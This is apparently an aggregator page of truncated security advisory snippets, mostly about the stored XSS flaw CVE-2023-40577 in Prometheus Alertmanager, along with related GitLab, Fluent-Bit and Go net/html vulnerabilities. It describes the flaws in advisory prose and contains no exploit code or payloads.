This Week in Spring - September 5th, 2023

Hi, Spring fans! Welcome to another installment of This Week in Spring! How are you? I just got back from another fabulous labor day weekend, and am headed to Oslo, Norway, for the fabulous JavaZone 2023 event. This will be my first time returning to lovely Oslo, Norway, since the pandemic! I can...

CVE-2023-40577

Prometheus Alertmanager is vulnerable to cross-site scripting due to improper validation of user-supplied input by the /api/v1/alerts endpoint. This issue could allow a remote attacker to inject malicious script into a web page, which would be executed in a victim's web browser within the hosting...

Security Bulletin: IBM MQ Operator and Queue manager container images are vulnerable to multiple vulnerabilities from systemd, libcap, openssl-libs, libxml2, go-toolset, and prometheus-operator

Summary Multiple issues were identified in Red Hat UBI packages systemd, libcap, openssl-libs, libxml2, go-toolset, and prometheus-operator that were shipped with IBM MQ Operator and IBM supplied MQ Advanced container images. IBM has addressed the vulnerabilities. Vulnerability Details...

CVE-2023-40577 vulnerabilities

Vulnerabilities for packages: prometheus-alertmanager...

DEBIAN-CVE-2023-40577

Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...

CVE-2023-40577 vulnerabilities

Vulnerabilities for packages: prometheus-alertmanager...

CVE-2023-40577

Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...

CVE-2023-40577

CVE-2023-40577 affects Prometheus Prometheus Alertmanager. The issue allows an attacker with POST permission on the /api/v1/alerts endpoint to cause arbitrary JavaScript execution in users of Alertmanager (stored XSS). The vulnerability is tied to the Alertmanager component handling incoming aler...

CVE-2023-40577

Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...

CVE-2023-40577 Alertmanager UI is vulnerable to stored XSS via the /api/v1/alerts endpoint

Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...

CVE-2023-40577

Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...

GHSA-V86X-5FM3-5P7J vulnerabilities

Vulnerabilities for packages: prometheus-alertmanager...

GHSA-V86X-5FM3-5P7J vulnerabilities

Vulnerabilities for packages: prometheus-alertmanager...

PT-2023-35948 · Git +1 · Fluent-Bit

Name of the Vulnerable Software and Affected Versions: No specific software or versions are mentioned in the provided description. Description: The issue is related to a crash type identified as Invalid-free. The crash state involves several functions, including reset context and cmt decode...

Information Disclosure

gitlab is vulnerable to Information Disclosure. The vulnerability exists because the Google IAP details in Prometheus integration are not properly hidden, which leads to the leak of project settings, instance and group details to other users...

Server-Side Request Forgery (SSRF)

gitlab is vulnerable to Server-Side Request Forgery SSRF. This vulnerability occurs through the prometheus intergration in gitlab which could lead to a SRRF attack...

SUSE: Security Advisory (SUSE-SU-2023:3144-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

GHSA-2WRH-6PVC-2JM9 vulnerabilities

Vulnerabilities for packages: aws-load-balancer-controller, rqlite, trillian, kiam, flux-notification-controller, node-problem-detector, aactl, yq, kube-state-metrics, crossplane-provider-aws, external-dns-fips, dynamic-localpv-provisioner, aws-ebs-csi-driver, flux-source-controller,...

CVE-2023-3978 vulnerabilities

Vulnerabilities for packages: aws-load-balancer-controller, rqlite, trillian, kiam, flux-notification-controller, node-problem-detector, aactl, yq, kube-state-metrics, crossplane-provider-aws, external-dns-fips, dynamic-localpv-provisioner, aws-ebs-csi-driver, flux-source-controller,...

AZL-35120 CVE-2023-3978 affecting package prometheus-adapter for versions less than 0.12.0-1

Text nodes not in the HTML namespace are incorrectly literally rendered, causing text which should be escaped to not be. This could lead to an XSS attack...